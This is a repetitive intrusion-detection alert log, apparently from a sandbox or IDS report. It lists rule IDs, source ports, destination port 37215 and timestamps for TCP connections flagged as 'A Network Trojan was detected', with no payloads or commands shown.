                  SID:2829579
                  Source Port:38582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179313
                  SID:2835222
                  Source Port:54256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.565962
                  SID:2835222
                  Source Port:43422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.596186
                  SID:2829579
                  Source Port:51608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984415
                  SID:2835222
                  Source Port:54632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.493700
                  SID:2835222
                  Source Port:47824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.469973
                  SID:2829579
                  Source Port:53114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.382774
                  SID:2829579
                  Source Port:48910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830760
                  SID:2835222
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.171305
                  SID:2835222
                  Source Port:37664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2829579
                  Source Port:49486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:53734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.523582
                  SID:2829579
                  Source Port:60296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.953196
                  SID:2835222
                  Source Port:59958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2829579
                  Source Port:59128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053274
                  SID:2829579
                  Source Port:53002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.616142
                  SID:2835222
                  Source Port:38836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.472197
                  SID:2835222
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758609
                  SID:2829579
                  Source Port:35360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.720198
                  SID:2835222
                  Source Port:53632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.746108
                  SID:2829579
                  Source Port:33080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814153
                  SID:2835222
                  Source Port:43682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2835222
                  Source Port:33530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.411489
                  SID:2835222
                  Source Port:48984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602749
                  SID:2835222
                  Source Port:53844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376255
                  SID:2835222
                  Source Port:47360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.742007
                  SID:2829579
                  Source Port:49270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173091
                  SID:2835222
                  Source Port:50258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106544
                  SID:2835222
                  Source Port:52738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.642305
                  SID:2829579
                  Source Port:53222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.367702
                  SID:2829579
                  Source Port:53164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654804
                  SID:2835222
                  Source Port:35204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.242541
                  SID:2829579
                  Source Port:51544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.147073
                  SID:2835222
                  Source Port:35132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131250
                  SID:2829579
                  Source Port:41922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2835222
                  Source Port:38664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2835222
                  Source Port:53010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883057
                  SID:2829579
                  Source Port:54506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449292
                  SID:2829579
                  Source Port:44934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.439171
                  SID:2835222
                  Source Port:56152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532217
                  SID:2829579
                  Source Port:37650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.291086
                  SID:2829579
                  Source Port:35066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.621146
                  SID:2829579
                  Source Port:44894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942697
                  SID:2829579
                  Source Port:53236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.000984
                  SID:2835222
                  Source Port:46784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.768053
                  SID:2835222
                  Source Port:39390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.032433
                  SID:2835222
                  Source Port:47730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.700993
                  SID:2835222
                  Source Port:45658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2829579
                  Source Port:38838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.542157
                  SID:2829579
                  Source Port:52224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.910325
                  SID:2829579
                  Source Port:56216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.620674
                  SID:2835222
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.544171
                  SID:2829579
                  Source Port:48952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.417071
                  SID:2829579
                  Source Port:57222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.445959
                  SID:2835222
                  Source Port:49160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.280856
                  SID:2829579
                  Source Port:33586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340754
                  SID:2835222
                  Source Port:41174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.461336
                  SID:2829579
                  Source Port:47596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.148653
                  SID:2829579
                  Source Port:42784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.870791
                  SID:2829579
                  Source Port:50360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201787
                  SID:2829579
                  Source Port:43864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.563321
                  SID:2835222
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.280856
                  SID:2835222
                  Source Port:45332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2835222
                  Source Port:50340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.527963
                  SID:2829579
                  Source Port:43448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.698482
                  SID:2835222
                  Source Port:39376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778762
                  SID:2835222
                  Source Port:60100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.256775
                  SID:2829579
                  Source Port:34826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.949287
                  SID:2829579
                  Source Port:39080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.154220
                  SID:2829579
                  Source Port:59298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.474239
                  SID:2835222
                  Source Port:43482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030544
                  SID:2835222
                  Source Port:50648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.396105
                  SID:2835222
                  Source Port:40386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.497518
                  SID:2835222
                  Source Port:38120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.399244
                  SID:2835222
                  Source Port:46906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.197285
                  SID:2829579
                  Source Port:58728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.093525
                  SID:2835222
                  Source Port:43872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.425783
                  SID:2835222
                  Source Port:53362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819139
                  SID:2835222
                  Source Port:52770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953541
                  SID:2835222
                  Source Port:34572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.914277
                  SID:2835222
                  Source Port:56046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128413
                  SID:2829579
                  Source Port:35968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632406
                  SID:2829579
                  Source Port:51470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2829579
                  Source Port:56312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.440990
                  SID:2835222
                  Source Port:34852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.333013
                  SID:2829579
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512071
                  SID:2835222
                  Source Port:33776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.595518
                  SID:2829579
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626199
                  SID:2835222
                  Source Port:49536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224175
                  SID:2829579
                  Source Port:41124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389277
                  SID:2829579
                  Source Port:39440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021968
                  SID:2829579
                  Source Port:54742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.140242
                  SID:2829579
                  Source Port:51190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.486586
                  SID:2829579
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.390670
                  SID:2829579
                  Source Port:45764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619678
                  SID:2835222
                  Source Port:57272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2829579
                  Source Port:45092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430533
                  SID:2835222
                  Source Port:44798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019292
                  SID:2829579
                  Source Port:48718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.020440
                  SID:2835222
                  Source Port:40746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.460852
                  SID:2829579
                  Source Port:58258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090916
                  SID:2835222
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.963816
                  SID:2835222
                  Source Port:57762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655125
                  SID:2829579
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.844473
                  SID:2835222
                  Source Port:51518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.302644
                  SID:2829579
                  Source Port:58930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.199657
                  SID:2829579
                  Source Port:38018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.665893
                  SID:2835222
                  Source Port:39574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.817859
                  SID:2829579
                  Source Port:36974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.656539
                  SID:2829579
                  Source Port:35408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.798764
                  SID:2829579
                  Source Port:58912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469332
                  SID:2835222
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.988914
                  SID:2835222
                  Source Port:54140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816680
                  SID:2829579
                  Source Port:43152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.949585
                  SID:2835222
                  Source Port:36894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.866267
                  SID:2835222
                  Source Port:50492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.976933
                  SID:2835222
                  Source Port:53702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.877145
                  SID:2829579
                  Source Port:46562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189850
                  SID:2829579
                  Source Port:47550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053274
                  SID:2835222
                  Source Port:57488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.589901
                  SID:2835222
                  Source Port:47150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472890
                  SID:2835222
                  Source Port:39728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.837976
                  SID:2835222
                  Source Port:48120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.679549
                  SID:2835222
                  Source Port:43184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254511
                  SID:2829579
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981356
                  SID:2835222
                  Source Port:39572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.468391
                  SID:2829579
                  Source Port:52804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:33566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.029781
                  SID:2829579
                  Source Port:39932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.571607
                  SID:2829579
                  Source Port:56626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.143446
                  SID:2835222
                  Source Port:44426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.834186
                  SID:2829579
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2829579
                  Source Port:57900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870525
                  SID:2835222
                  Source Port:32918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.058899
                  SID:2835222
                  Source Port:43072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593723
                  SID:2835222
                  Source Port:33514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603574
                  SID:2829579
                  Source Port:45862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.764508
                  SID:2829579
                  Source Port:55656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2835222
                  Source Port:43662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.901324
                  SID:2829579
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429801
                  SID:2835222
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.388758
                  SID:2835222
                  Source Port:39204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.978087
                  SID:2829579
                  Source Port:50506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921267
                  SID:2835222
                  Source Port:48898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2829579
                  Source Port:50694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.800437
                  SID:2829579
                  Source Port:33772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.155297
                  SID:2835222
                  Source Port:44072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.558298
                  SID:2829579
                  Source Port:43178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.821623
                  SID:2835222
                  Source Port:47390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122449
                  SID:2835222
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005351
                  SID:2829579
                  Source Port:52624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.450781
                  SID:2835222
                  Source Port:44988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537934
                  SID:2835222
                  Source Port:42342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.477635
                  SID:2829579
                  Source Port:60926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432060
                  SID:2829579
                  Source Port:52336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:55370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.439109
                  SID:2829579
                  Source Port:39918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027039
                  SID:2829579
                  Source Port:40398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463374
                  SID:2829579
                  Source Port:47912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.843292
                  SID:2829579
                  Source Port:50880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.446922
                  SID:2835222
                  Source Port:57298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.723777
                  SID:2835222
                  Source Port:53352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785401
                  SID:2829579
                  Source Port:47634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533467
                  SID:2835222
                  Source Port:39470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459798
                  SID:2829579
                  Source Port:41988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.384906
                  SID:2829579
                  Source Port:60384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.211631
                  SID:2835222
                  Source Port:60116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.652584
                  SID:2835222
                  Source Port:36522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437797
                  SID:2829579
                  Source Port:33450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.801277
                  SID:2835222
                  Source Port:60726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639081
                  SID:2835222
                  Source Port:55058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.910402
                  SID:2829579
                  Source Port:41302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.774897
                  SID:2835222
                  Source Port:40324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.130042
                  SID:2829579
                  Source Port:37106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.431055
                  SID:2829579
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156684
                  SID:2835222
                  Source Port:58062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.829287
                  SID:2835222
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384397
                  SID:2829579
                  Source Port:56094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:58910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.900911
                  SID:2829579
                  Source Port:32952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909297
                  SID:2829579
                  Source Port:58572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542155
                  SID:2835222
                  Source Port:42606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.571103
                  SID:2829579
                  Source Port:56658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
